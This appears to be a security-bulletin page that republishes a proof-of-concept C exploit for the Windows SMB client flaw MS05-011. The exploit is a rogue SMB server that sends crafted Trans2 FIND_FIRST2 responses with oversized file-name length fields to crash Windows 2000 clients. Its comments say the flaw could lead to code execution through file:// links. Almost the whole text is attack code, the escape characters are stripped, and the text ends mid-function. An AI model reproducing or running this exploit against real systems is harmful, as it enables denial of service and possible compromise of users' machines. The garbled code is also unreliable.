‘Windows SMB Client Transaction Response Handling (Exploit, MS05-011)’

Summary

A remote code execution vulnerability exists in Server Message Block (SMB) that allows an attacker who successfully exploited this vulnerable to take complete control of the affected system. The following exploit code exploits the recently reported vulnerability to execute code on vulnerable system.’

Credit:

‘The information has been provided by cybertronic.
The original article can be found at: http://www.livejournal.com/users/cybertronic/


Details

Vulnerability details:
Vulnerability in Server Message Block Allows Remote Code Execution (MS05-011)
Windows SMB Client Transaction Response Handling Technical Details (MS05-011)
Vulnerability in Server Message Block Allows Remote Code Execution (MS05-027)

Exploit:
/*
* Windows SMB Client Transaction Response Handling
*
* MS05-011
* CAN-2005-0045
*
* This works against Win2k
*
* cybertronic[at]gmx[dot]net
* http://www.livejournal.com/users/cybertronic/
*
* usage:
* gcc -o mssmb_poc mssmb_poc.c
* ./mssmb_poc
*
* connect via \ip
* and hit the netbios folder!
*
* ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,
* 0x00000000)
* PAGE_FAULT_IN_NONPAGED_AREA
*
* The Client reboots immediately
*
* Technical Details:
* —————–
*
* The driver MRXSMB.SYS is responsible for performing SMB
* client operations and processing the responses returned
* by an SMB server service. A number of important Windows
* File Sharing operations, and all RPC-over-named-pipes,
* use the SMB commands Trans (25h) and Trans2 (32h). A
* malicious SMB server can respond with specially crafted
* Transaction response data that will cause an overflow
* wherever the data is handled, either in MRXSMB.SYS or
* in client code to which it provides data. One example
* would be if the
*
* file name length field
*
* and the
*
* short file name length field
*
* in a Trans2 FIND_FIRST2 response packet can be supplied
* with inappropriately large values in order to cause an
* excessive memcpy to occur when the data is handled.
* In the case of these examples an attacker could leverage
* file:// links, that when clicked by a remote user, would
* lead to code execution.
*
*/

#include
#include
#include
#include

#define PORT 445

unsigned char SmbNeg[] =
‘x00x00x00x55’
‘xffx53x4dx42’ // SMB
‘x72’ // SMB Command: Negotiate Protocol (0x72)
‘x00x00x00x00’ // NT Status: STATUS_SUCCESS (0x00000000)
‘x98’ // Flags: 0x98
‘x53xc8’ // Flags2 : 0xc853
‘x00x00’ // Process ID High: 0
‘x00x00x00x00x00x00x00x00’ // Signature: 0000000000000000
‘x00x00’ // Reserved: 0000
‘x00x00’ // Tree ID: 0
‘xffxfe’ // Process ID: 65279
‘x00x00’ // User ID: 0
‘x00x00’ // Multiplex ID: 0
‘x11’ // Word Count (WCT): 17
‘x05x00’ // Dialect Index: 5, greater than LANMAN2.1
‘x03’ // Security Mode: 0x03
‘x0ax00’ // Max Mpx Count: 10
‘x01x00’ // Max VCs: 1
‘x04x11x00x00’ // Max Buffer Size: 4356
‘x00x00x01x00’ // Max Raw Buffer 65536
‘x00x00x00x00’ // Session Key: 0x00000000
‘xfdxe3x00x80’ // Capabilities: 0x8000e3fd
‘x52xa2x4ex73xcbx75xc5x01’
// System Time: Jun 20, 2005 12:08:32.327125000
‘x88xff’ // Server Time Zone: /120 min from UTC
‘x00’ // Key Length: 0
‘x10x00’ // Byte Count (BCC): 16
‘x9ex12xd7x77xd4x59x6cx40’ // Server GUID: 9E12D777D4596C40
‘xbcxc0xb4x22x40x50x01xd4’;// BCC0B422405001D4

unsigned char SessionSetupAndXNeg[] = // Negotiate ERROR Response
‘x00x00x01x1b’
‘xffx53x4dx42x73x16x00x00xc0x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x04xffx00x1bx01x00x00xa6x00xf0x00x4ex54x4cx4dx53’
‘x53x50x00x02x00x00x00x12x00x12x00x30x00x00x00x15’
‘x82x8axe0’
‘x00x00x00x00x00x00x00x00’ // NTLM Challenge
‘x00x00x00x00x00x00x00x00x64x00x64x00x42x00x00x00’
‘x53x00x45x00x52x00x56x00x49x00x43x00x45x00x50x00’
‘x43x00x02x00x12x00x53x00x45x00x52x00x56x00x49x00’
‘x43x00x45x00x50x00x43x00x01x00x12x00x53x00x45x00’
‘x52x00x56x00x49x00x43x00x45x00x50x00x43x00x04x00’
‘x12x00x73x00x65x00x72x00x76x00x69x00x63x00x65x00’
‘x70x00x63x00x03x00x12x00x73x00x65x00x72x00x76x00’
‘x69x00x63x00x65x00x70x00x63x00x06x00x04x00x01x00’
‘x00x00x00x00x00x00x00x57x00x69x00x6ex00x64x00x6f’
‘x00x77x00x73x00x20x00x35x00x2ex00x31x00x00x00x57’
‘x00x69x00x6ex00x64x00x6fx00x77x00x73x00x20x00x32’
‘x00x30x00x30x00x30x00x20x00x4cx00x41x00x4ex00x20’
‘x00x4dx00x61x00x6ex00x61x00x67x00x65x00x72x00x00’;

unsigned char SessionSetupAndXAuth[] =
‘x00x00x00x75’
‘xffx53x4dx42x73x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x04xffx00x75x00x01x00x00x00x4ax00x4ex57x00x69x00’
‘x6ex00x64x00x6fx00x77x00x73x00x20x00x35x00x2ex00’
‘x31x00x00x00x57x00x69x00x6ex00x64x00x6fx00x77x00’
‘x73x00x20x00x32x00x30x00x30x00x30x00x20x00x4cx00’
‘x41x00x4ex00x20x00x4dx00x61x00x6ex00x61x00x67x00’
‘x65x00x72x00x00’;

unsigned char TreeConnectAndX[] =
‘x00x00x00x38’
‘xffx53x4dx42x75x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x07xffx00x38x00x01x00xffx01x00x00xffx01x00x00x07’
‘x00x49x50x43x00x00x00x00’;

unsigned char SmbNtCreate [] =
‘x00x00x00x87’
‘xffx53x4dx42’ // SMB
‘xa2’ // SMB Command: NT Create AndX (0xa2)
‘x00x00x00x00’ // NT Status: STATUS_SUCCESS (0x00000000)
‘x98’ // Flags: 0x98
‘x07xc8’ // Flags2 : 0xc807
‘x00x00’ // Process ID High: 0
‘x00x00x00x00x00x00x00x00’ // Signature: 0000000000000000
‘x00x00’ // Reserved: 0000
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // User ID: 0
‘x00x00’ // Multiplex ID: 0
‘x2a’ // Word Count (WCT): 42
‘xff’ // AndXCommand: No further commands (0xff)
‘x00’ // Reserved: 00
‘x87x00’ // AndXOffset: 135
‘x00’ // Oplock level: No oplock granted (0)
‘x00x00’ // FID: 0
‘x01x00x00x00’ // Create action: The file existed and was opened (1)
‘x00x00x00x00x00x00x00x00’ // Created: No time specified (0)
‘x00x00x00x00x00x00x00x00’ // Last Access: No time specified (0)
‘x00x00x00x00x00x00x00x00’ // Last Write: No time specified (0)
‘x00x00x00x00x00x00x00x00’ // Change: No time specified (0)
‘x80x00x00x00’ // File Attributes: 0x00000080
‘x00x10x00x00x00x00x00x00’ // Allocation Size: 4096
‘x00x00x00x00x00x00x00x00’ // End Of File: 0
‘x02x00’ // File Type: Named pipe in message mode (2)
‘xffx05’ // IPC State: 0x05ff
‘x00’ // Is Directory: This is NOT a directory (0)
‘x00x00’ // Byte Count (BCC): 0

// crap
‘x00x00x00x0fx00x00x00x00’
‘x00x74x7ax4fxacx2dxdfxd9’
‘x11xb9x20x00x10xdcx9bx01’
‘x12x00x9bx01x12x00x1bxc2’;

unsigned char DceRpc[] =
‘x00x00x00x7c’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x44x00x00x00x00x00x38x00x00x00x44x00x38’
‘x00x00x00x00x00x45x00x00x05x00x0cx03x10x00x00x00’
‘x44x00x00x00x01x00x00x00xb8x10xb8x10’
‘x00x00x00x00’ // Assoc Group
‘x0dx00x5cx50x49x50x45x5c’
‘x00x00x00’ // srv or wks
‘x73x76x63x00xffx01x00x00x00x00x00x00x00x04x5dx88’
‘x8axebx1cxc9x11x9fxe8x08x00x2bx10x48x60x02x00x00’
‘x00’;

unsigned char WksSvc[] =
‘x00x00x00xb0’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x78x00x00x00x00x00x38x00x00x00x78x00x38’
‘x00x00x00x00x00x79x00x00x05x00x02x03x10x00x00x00’
‘x78x00x00x00x01x00x00x00x60x00x00x00x00x00x00x00’
‘x64x00x00x00xb8x0fx16x00xf4x01x00x00xe6x0fx16x00’
‘xd2x0fx16x00x05x00x00x00x01x00x00x00x0ax00x00x00’
‘x00x00x00x00x0ax00x00x00x53x00x45x00x52x00x56x00’
‘x49x00x43x00x45x00x50x00x43x00x00x00x0ax00x00x00’
‘x00x00x00x00x0ax00x00x00x57x00x4fx00x52x00x4bx00’
‘x47x00x52x00x4fx00x55x00x50x00x00x00x00x00x00x00’;

unsigned char SrvSvc[] =
‘x00x00x00xac’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x74x00x00x00x00x00x38x00x00x00x74x00x38’
‘x00x00x00x00x00x75x00x00x05x00x02x03x10x00x00x00’
‘x74x00x00x00x01x00x00x00x5cx00x00x00x00x00x00x00’
‘x65x00x00x00x68x3dx14x00xf4x01x00x00’
‘x80x3dx14x00’ // Server IP
‘x05x00x00x00x01x00x00x00x03x10x05x00x9cx3dx14x00’
‘x0ex00x00x00x00x00x00x00x0ex00x00x00’
‘x31x00x39x00x32x00x2ex00x31x00x36x00x38x00x2ex00’
// Server IP ( UNICODE )
‘x32x00x2ex00x31x00x30x00x33x00x00x00’
‘x01x00x00x00x00x00x00x00x01x00x00x00x00x00x55x00’
‘x00x00x00x00’;

unsigned char SmbClose[] =
‘x00x00x00x23’
‘xffx53x4dx42’ // SMB
‘x04’ // SMB Command: Close (0x04)
‘x00x00x00x00’ // NT Status: STATUS_SUCCESS (0x00000000)
‘x98’ // Flags: 0x98
‘x07xc8’ // Flags2 : 0xc807
‘x00x00’ // Process ID High: 0
‘x00x00x00x00x00x00x00x00’ // Signature: 0000000000000000
‘x00x00’ // Reserved: 0000
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x00’ // Word Count (WCT): 0
‘x00x00’; // Byte Count (BCC): 0

unsigned char NetrShareEnum[] =
‘x00x00x01x90’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x58x01x00x00x00x00x38x00x00x00x58x01x38’
‘x00x00x00x00x00x59x01x00x05x00x02x03x10x00x00x00’
‘x58x01x00x00x01x00x00x00x40x01x00x00x00x00x00x00’
‘x01x00x00x00x01x00x00x00x54x0ax17x00x04x00x00x00’
‘xa0x28x16x00x04x00x00x00x80x48x16x00x03x00x00x80’
‘x8ax48x16x00x6ex48x16x00x00x00x00x00x7ex48x16x00’
‘x48x48x16x00x00x00x00x80x56x48x16x00x20x48x16x00’
‘x00x00x00x80x26x48x16x00x05x00x00x00x00x00x00x00’
‘x05x00x00x00x49x00x50x00x43x00x24x00x00x00x36x00’
‘x0bx00x00x00x00x00x00x00x0bx00x00x00x52x00x65x00’
‘x6dx00x6fx00x74x00x65x00x2dx00x49x00x50x00x43x00’
‘x00x00x37x00x08x00x00x00x00x00x00x00x08x00x00x00’
‘x6ex00x65x00x74x00x62x00x69x00x6fx00x73x00x00x00’
‘x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00’
‘x07x00x00x00x00x00x00x00x07x00x00x00x41x00x44x00’
‘x4dx00x49x00x4ex00x24x00x00x00x00x00x0cx00x00x00’
‘x00x00x00x00x0cx00x00x00x52x00x65x00x6dx00x6fx00’
‘x74x00x65x00x61x00x64x00x6dx00x69x00x6ex00x00x00’
‘x03x00x00x00x00x00x00x00x03x00x00x00x43x00x24x00’
‘x00x00x39x00x11x00x00x00x00x00x00x00x11x00x00x00’
‘x53x00x74x00x61x00x6ex00x64x00x61x00x72x00x64x00’
‘x66x00x72x00x65x00x69x00x67x00x61x00x62x00x65x00’
‘x00x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00’;

unsigned char OpenPrinterEx[] =
‘x00x00x00x68’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x30x00x00x00x00x00x38x00x00x00x30x00x38’
‘x00x00x00x00x00x31x00x00x05x00x02x03x10x00x00x00’
‘x30x00x00x00x01x00x00x00x18x00x00x00x00x00x00x00’
‘x00x00x00x00x24xd7x9cxf8xbbxe1xd9x11xb9x29x00x10’
‘xdcx4ax6bxbbx00x00x00x00’;

unsigned char ClosePrinter[] =
‘x00x00x00x68’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x30x00x00x00x00x00x38x00x00x00x30x00x38’
‘x00x00x00x00x00x31x00x00x05x00x02x03x10x00x00x00’
‘x30x00x00x00x02x00x00x00x18x00x00x00x00x00x00x00’
‘x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00’
‘x00x00x00x00x00x00x00x00’;

unsigned char OpenHklm[] =
‘x00x00x00x68’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x30x00x00x00x00x00x38x00x00x00x30x00x38’
‘x00x00x00x00x00x31x00x00x05x00x02x03x10x00x00x00’
‘x30x00x00x00x01x00x00x00x18x00x00x00x00x00x00x00’
‘x00x00x00x00x4ex4cxb2xf8xbbxe1xd9x11xb9x29x00x10’
‘xdcx4ax6bxbbx00x00x00x00’;

unsigned char OpenKey[] =
‘x00x00x00x68’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x30x00x00x00x00x00x38x00x00x00x30x00x38’
‘x00x00x00x00x00x31x00x00x05x00x02x03x10x00x00x00’
‘x30x00x00x00x02x00x00x00x18x00x00x00x00x00x00x00’
‘x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00’
‘x00x00x00x00x05x00x00x00’;

unsigned char CloseKey[] =
‘x00x00x00x68’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x30x00x00x00x00x00x38x00x00x00x30x00x38’
‘x00x00x00x00x00x31x00x00x05x00x02x03x10x00x00x00’
‘x30x00x00x00x03x00x00x00x18x00x00x00x00x00x00x00’
‘x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00’
‘x00x00x00x00x00x00x00x00’;

unsigned char NetBios1[] =
‘x00x00x00x94’
‘xffx53x4dx42x25x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0ax00x00x5cx00x00x00x00x00x38x00x00x00x5cx00x38’
‘x00x00x00x00x00x5dx00x00x05x00x02x03x10x00x00x00’
‘x5cx00x00x00x01x00x00x00x44x00x00x00x00x00x00x00’
‘x01x00x00x00xc0xa2x16x00xaexc2x16x00x00x00x00x00’
‘xbexc2x16x00x08x00x00x00x00x00x00x00x08x00x00x00’
‘x6ex00x65x00x74x00x62x00x69x00x6fx00x73x00x00x00’
‘x01x00x00x00x00x00x00x00x01x00x00x00x00x00x2ex00’
‘x00x00x00x00’;

unsigned char NetBios2[] =
‘x00x00x00x3e’
‘xffx53x4dx42x75x00x00x00x00x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x07xffx00x3ex00x01x00xffx01x00x00xffx01x00x00x0d’
‘x00x41x3ax00x4ex00x54x00x46x00x53x00x00x00’;

// Trans2 Response, QUERY_PATH_INFO
unsigned char Trans2Response1[] =
‘x00x00x00x64’
‘xffx53x4dx42’ // SMB
‘x32’ // SMB Command: Trans2 (0x32)
‘x00x00x00x00’ // NT Status: STATUS_SUCCESS (0x00000000)
‘x98’ // Flags: 0x98
‘x07xc8’ // Flags2 : 0xc807
‘x00x00’ // Process ID High: 0
‘x00x00x00x00x00x00x00x00’ // Signature: 0000000000000000
‘x00x00’ // Reserved: 0000
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0a’ // Word Count (WCT): 10
‘x02x00’ // Total Parameter Count: 2
‘x28x00’ // Total Data Count: 40
‘x00x00’ // Reserved: 0000
‘x02x00’ // Parameter Count: 2
‘x38x00’ // Parameter Offset: 56
‘x00x00’ // Parameter Displacement: 0
‘x28x00’ // Data Count: 40
‘x3cx00’ // Data Offset: 60
‘x00x00’ // Data Displacement: 0
‘x00’ // Setup Count: 0
‘x00’ // Reserved: 00
‘x2dx00’ // Byte Count (BCC): 45
‘x00’ // Padding: 00
‘x00x00’ // EA Error offset: 0
‘x00x01’ // Padding: 0001
‘xe8x35xcfx94x39x73xc5x01’ // Created: Jun 17, 2005 05:39:19.686500000
‘x8cx24xbax5cx3ax73xc5x01’ // Last Access: Jun 17, 2005 05:44:55.092750000
‘xe8x35xcfx94x39x73xc5x01’ // Last Write: Jun 17, 2005 05:39:19.686500000
‘x9cx81x67x98x39x73xc5x01’ // Change: Jun 17, 2005 05:39:25.717750000
‘x10x00x00x00’ // File Attributes: 0x00000010
‘x00x00x00x00’; // Unknown Data: 00000000

// Trans2 Response, QUERY_PATH_INFO
unsigned char Trans2Response2[] = // ERROR Response
‘x00x00x00x23’
‘xffx53x4dx42x32x34x00x00xc0x98x07xc8x00x00x00x00’
‘x00x00x00x00x00x00x00x00’
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x00x00x00’;

// Trans2 Response, FIND_FIRST2, Files: . ..
unsigned char Trans2Response3[] =
‘x00x00x01x0c’
‘xffx53x4dx42’ // SMB
‘x32’ // SMB Command: Trans2 (0x32)
‘x00x00x00x00’ // NT Status: STATUS_SUCCESS (0x00000000)
‘x98’ // Flags: 0x98
‘x07xc8’ // Flags2 : 0xc807
‘x00x00’ // Process ID High: 0
‘x00x00x00x00x00x00x00x00’ // Signature: 0000000000000000
‘x00x00’ // Reserved: 0000
‘x00x00’ // Tree ID: 0
‘x00x00’ // Process ID: 0
‘x00x00’ // USER ID
‘x00x00’ // Multiplex ID: 0
‘x0a’ // Word Count (WCT): 10
‘x0ax00’ // Total Parameter Count: 10
‘xc8x00’ // Total Data Count: 200
‘x00x00’ // Reserved: 0000
‘x0ax00’ // Parameter Count: 10
‘x38x00’ // Parameter Offset: 56
‘x00x00’ // Parameter Displacement: 0
‘xc8x00’ // Data Count: 200
‘x44x00’ // Data Offset: 68
‘x00x00’ // Data Displacement: 0
‘x00’ // Setup Count: 0
‘x00’ // Reserved: 00
‘xd5x00’ // Byte Count (BCC): 213
‘x00’ // Padding: 00
‘x01x08’ // Search ID: 0x0801
‘x02x00’ // Seatch Count: 2
‘x01x00’ // End of Search: 1
‘x00x00’ // EA Error offset: 0
‘x60x00’ // Last Name offset: 96
‘x38x00’ // Padding: 3800
‘x60x00x00x00’ // Next Entry offset: 96
‘x00x00x00x00’ // File Index: 0
‘xe8x35xcfx94x39x73xc5x01’ // Created: Jun 17, 2005 05:39:19.686500000
‘xacx09x3cxaex39x73xc5x01’ // Last Access: Jun 17, 2005 05:40:02.342750000
‘xe8x35xcfx94x39x73xc5x01’ // Last Write: Jun 17, 2005 05:39:19.686500000
‘x9cx81x67x98x39x73xc5x01’ // Change: Jun 17, 2005 05:39:25.717750000
‘x00x00x00x00x00x00x00x00’ // End of File: 0
‘x00x00x00x00x00x00x00x00’ // Allocation Size: 0
‘x10x00x00x00′ // File Attributes: 0x00000010
//’x02x00x00x00’ // File Name Len: 2
‘xffxffxffxff’ // Bad File Name Len
‘x00x00x00x00′ // EA List Length: 0
//’x00’ // Short File Name Len: 0
‘xff’ // Bad Short File Name Len
‘x00’ // Reserved: 00
‘x00x00x00x00x00x00x00x00’ // Short File Name:
‘x00x00x00x00x00x00x00x00’ // Short File Name:
‘x00x00x00x00x00x00x00x00’ // Short File Name:
‘x2ex00’ // File Name: .
‘x00x00x00x00’ // Next Entry Offset: 0
‘x00x00x00x00’ // File Index: 0
‘xe8x35xcfx94x39x73xc5x01’ // Created: Jun 17, 2005 05:39:19.686500000
‘xacx09x3cxaex39x73xc5x01’ // Last Access: Jun 17, 2005 05:40:02.342750000
‘xe8x35xcfx94x39x73xc5x01’ // Last Write: Jun 17, 2005 05:39:19.686500000
‘x9cx81x67x98x39x73xc5x01’ // Change: Jun 17, 2005 05:39:25.717750000
‘x00x00x00x00x00x00x00x00’ // End Of File: 0
‘x00x00x00x00x00x00x00x00’ // Allocation Size: 0
‘x10x00x00x00’ // File Attributes: 0x00000010
‘x04x00x00x00’ // File Name Len: 4
‘x00x00x00x00’ // EA List Length: 0
‘x00’ // Short File Name Len: 0
‘x00’ // Reserved: 00
‘x00x00x00x00x00x00x00x00’ // Short File Name:
‘x00x00x00x00x00x00x00x00’ // Short File Name:
‘x00x00x00x00x00x00x00x00’ // Short File Name:
‘x2ex00x2ex00’ // File Name: ..
‘x00x00x00x00x00x00’; // Unknown Data: 000000000000

int
check_interface ( char* str )
{
int i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;

//Interface UUID
unsigned char wks_uuid[] = ‘x98xd0xffx6bx12xa1x10x36x98x33x46xc3xf8x7ex34x5a’;
unsigned char srv_uuid[] = ‘xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88’;
unsigned char spl_uuid[] = ‘x78x56x34x12x34x12xcdxabxefx00x01x23x45x67x89xab’;
unsigned char wrg_uuid[] = ‘x01xd0x8cx33x44x22xf1x31xaaxaax90x00x38x00x10x03’;

for ( i = 0; i < 16; i++ ) { j = 0; if ( str[120 + i] < 0 ) { if ( ( str[120 + i] + 0x100 ) == wks_uuid[i] ) { wks++; j = 1; } if ( ( str[120 + i] + 0x100 ) == srv_uuid[i] ) { srv++; j = 1; } if ( ( str[120 + i] + 0x100 ) == spl_uuid[i] ) { spl++; j = 1; } if ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] ) { wrg++; j = 1; } if ( j == 0 ) foo++; } else { if ( str[120 + i] == wks_uuid[i] ) { wks++; j = 1; } if ( str[120 + i] == srv_uuid[i] ) { srv++; j = 1; } if ( str[120 + i] == spl_uuid[i] ) { spl++; j = 1; } if ( str[120 + i] == wrg_uuid[i] ) { wrg++; j = 1; } if ( j == 0 ) foo++; } } if ( wks == 16 ) return ( 0 ); else if ( srv == 16 ) return ( 1 ); else if ( spl == 16 ) return ( 2 ); else if ( wrg == 16 ) return ( 3 ); else { printf ( 'there is/are %d invalid byte(s) in the interface UUID!n', foo ); return ( -1 ); } } void neg ( int s ) { char response[1024]; bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); send ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 ); } void sessionsetup ( int s, unsigned long userid, unsigned long treeid, int option ) { char response[1024]; unsigned char ntlm_challenge1[] = 'xa2x75x1bx10xe7x62xb0xc3'; unsigned char ntlm_challenge2[] = 'xe1xedx43x66xc7xa7x36xbd'; bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'SessionSetupAndXNegn' ); SessionSetupAndXNeg[30] = response[30]; SessionSetupAndXNeg[31] = response[31]; SessionSetupAndXNeg[34] = response[34]; SessionSetupAndXNeg[35] = response[35]; strncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 ); if ( option == 0 ) memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 ); else memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 ); send ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'SessionSetupAndXAuthn' ); SessionSetupAndXAuth[30] = response[30]; SessionSetupAndXAuth[31] = response[31]; SessionSetupAndXAuth[34] = response[34]; SessionSetupAndXAuth[35] = response[35]; strncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 ); send ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'TreeConnectAndXn' ); TreeConnectAndX[30] = response[30]; TreeConnectAndX[31] = response[31]; TreeConnectAndX[34] = response[34]; TreeConnectAndX[35] = response[35]; strncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 ); send ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 ); } void digg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option ) { int ret; char response[1024]; unsigned char srv[] = 'x73x72x76'; unsigned char wks[] = 'x77x6bx73'; bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'SmbNtCreaten' ); SmbNtCreate[30] = response[30]; SmbNtCreate[31] = response[31]; SmbNtCreate[34] = response[34]; SmbNtCreate[35] = response[35]; strncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 ); strncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 ); send ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'DceRpcn' ); DceRpc[30] = response[30]; DceRpc[31] = response[31]; DceRpc[34] = response[34]; DceRpc[35] = response[35]; strncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 ); strncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 ); ret = check_interface ( response ); if ( ret == 0 ) memcpy ( DceRpc + 92, wks, 3 ); else if ( ret == 1 ) memcpy ( DceRpc + 92, srv, 3 ); else if ( ret == 2 ); else if ( ret == 3 ); else { printf ( 'invalid interface uuid, aborting...n' ); exit ( 1 ); } send ( s, DceRpc, sizeof ( DceRpc ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); if ( option == 1 ) { printf ( 'NetrShareEnumn' ); NetrShareEnum[30] = response[30]; NetrShareEnum[31] = response[31]; NetrShareEnum[34] = response[34]; NetrShareEnum[35] = response[35]; strncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 ); send ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 ); } else if ( ( option == 2 ) && ( ret == 2 ) ) { printf ( 'OpenPrinterExn' ); OpenPrinterEx[30] = response[30]; OpenPrinterEx[31] = response[31]; OpenPrinterEx[34] = response[34]; OpenPrinterEx[35] = response[35]; strncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 ); send ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 ); bzero ( &response, sizeof ( response ) ); recv ( s, response, sizeof ( response ) -1, 0 ); printf ( 'ClosePrintern' ); ClosePrinter[30] = response[30]; ClosePrinter[31] = response[31]; ClosePrinter[34] = response[34]; ClosePrinter[35] = response[35]; strncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 ); strncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 ); send ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 ); } else if ( ( option == 3 ) && ( ret == 3 ) ) { printf ( 'OpenHklmn' ); OpenHklm[30] = response[30]; OpenHklm[31] = response[31]; OpenHklm[34] 